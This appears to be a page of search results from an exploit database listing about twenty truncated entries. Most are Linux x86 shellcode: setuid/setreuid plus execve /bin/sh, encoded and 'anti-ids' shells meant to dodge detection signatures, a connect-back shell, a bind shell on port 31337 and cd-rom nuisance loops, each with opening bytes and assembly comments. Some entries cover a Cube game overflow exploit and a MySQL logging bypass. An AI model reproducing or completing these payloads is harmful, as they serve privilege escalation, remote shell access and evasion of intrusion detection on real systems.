3386 matches found
linux/x86 - setuid0 + execve"/bin/sh", "/bin/sh", NULL 31 bytes
linux/x86 setuid0 + execve"/bin/sh", "/bin/sh", NULL 31 bytes. Shellcode exploit for linx86 platform / Linux/x86 setuid0 + execve"/bin/sh", "/bin/sh", NULL - 31 bytes - [email protected] / char shellcode = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" // int...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytes
Exploit for linux/x86 platform in category shellcode ======================================================= linux/x86 execve"/bin/sh", "/bin/sh", NULL 25 bytes ======================================================= / Linux/x86 execve"/bin/sh", "/bin/sh", NULL - 25 bytes - email protected / char...
linux/x86 - execve"/bin/sh", "/bin/sh", NULL 23 bytes
linux/x86 execve"/bin/sh", "/bin/sh", NULL 23 bytes. Shellcode exploit for linx86 platform / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security Linux/x86 execve"/bin/sh", "/bin/sh", NULL / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %ed...
linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 setreuid0,0 execve"/bin/sh", "/bin/sh", NULL 33 bytes ===================================================================== / Linux/x86 setreuid0,0 + execve"/bin/sh...
UltraVNC w/ DSM plugin detection
UltraVNC seems to be running on the remote port. Upon connection, the remote service on this port always sends the same 12 pseudo-random bytes. It is probably UltraVNC with the DSM encryption plugin. This plugin tunnels the RFB protocol into a RC4 encrypted stream. SPDX-FileCopyrightText: 2006...
Cube <= 2005_08_29 Multiple BoF/Crash Vulnerabilities Exploit
No description provided by source. / by Luigi Auriemma You NEED Enet for compiling this tool then remember -lenet http://enet.bespin.org / http://enet.cubik.org / include stdio.h include stdlib.h include string.h include enet/enet.h define VER "0.1" define PORT 28765 define MAXTRANS 5000 define...
MySQL 5.0.18 - Query Logging Bypass
MySQL 5.0.18 - Query Logging Bypass source: https://www.securityfocus.com/bid/16850/info MySQL is prone to a query-logging-bypass vulnerability. This issue is due to a discrepancy between the handling of NULL bytes in the 'mysqlrealquery' function and in the query-logging functionality. This issu...
MySQL 5.0.18 - Query Logging Bypass
source: https://www.securityfocus.com/bid/16850/info MySQL is prone to a query-logging-bypass vulnerability. This issue is due to a discrepancy between the handling of NULL bytes in the 'mysqlrealquery' function and in the query-logging functionality. This issue allows attackers to bypass the...
linux/x86 -execve /bin/sh anti-ids 40 bytes
linux/x86 execve /bin/sh anti-ids 40 bytes. Shellcode exploit for linx86 platform / N Shell : shellcodez Arch:x86 Platform:linux Size:40 Description: The shellcode to execute /bin/sh; This shellcode is anti-ids It not containz encoding engine but it not contain standart signatures as: "\xcd\x80"...
linux/x86 execve /bin/sh anti-ids 40 bytes
Exploit for linux/x86 platform in category shellcode ========================================== linux/x86 execve /bin/sh anti-ids 40 bytes ========================================== / N Shell : shellcodez Arch:x86 Platform:linux Size:40 Description: The shellcode to execute /bin/sh; This shellcod...
linux/x86 - execve /bin/sh encoded by +1 39 bytes
linux/x86 execve /bin/sh encoded by +1 39 bytes. Shellcode exploit for linx86 platform / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" /...
linux/x86 execve /bin/sh (encoded by +1) 39 bytes
No description provided by source. / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik [email protected] / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" // push $0xe48a6f6a...
linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes
No description provided by source. / linux/x86 getppid + execve"/proc/pid/exe", "/proc/pid/exe", NULL - 51 bytes - izik [email protected] / char shellcode = "\x6a\x40" // push $0x40 "\x58" // pop %eax "\xcd\x80" // int $0x80 // // convert: // "\x4c" // dec %esp "\x99" // cltd "\x6a\x0a" // push $0xa...
linux/x86 24/7 open cd-rom loop (follows /dev/cdrom symlink) 39 bytes
No description provided by source. / linux/x86 24/7 open cd-rom loop follows "/dev/cdrom" symlink - 39 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch "\x68\x64\x72\x6f\x6d" // pus...
linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes
linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes. Shellcode exploit for linx86 platform / linux/x86 24/7 open cd-rom loop follows "/dev/cdrom" symlink - 39 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...
linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes
Exploit for linux/x86 platform in category shellcode ============================================================= linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes ============================================================= / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - ...
linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes
Exploit for linux/x86 platform in category shellcode ==================================================================== linux/x86 cat /dev/urandom /dev/console, just for kicks - 63 bytes ==================================================================== / linux/x86 cat /dev/urandom...
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes. Shellcode exploit for linx86 platform / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx...
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
Exploit for linux/x86 platform in category shellcode ============================================ linux/x86 Bind /bin/sh to 31337/tcp 80 bytes ============================================ / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" ...
linux/x86 eject/close cd-rom loop follows /dev/cdrom symlink 45 bytes
linux/x86 eject/close cd-rom loop follows /dev/cdrom symlink 45 bytes. Shellcode exploit for linx86 platform / linux/x86 eject & close cd-rom frenzy loop follows "/dev/cdrom" symlink - 45 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51"...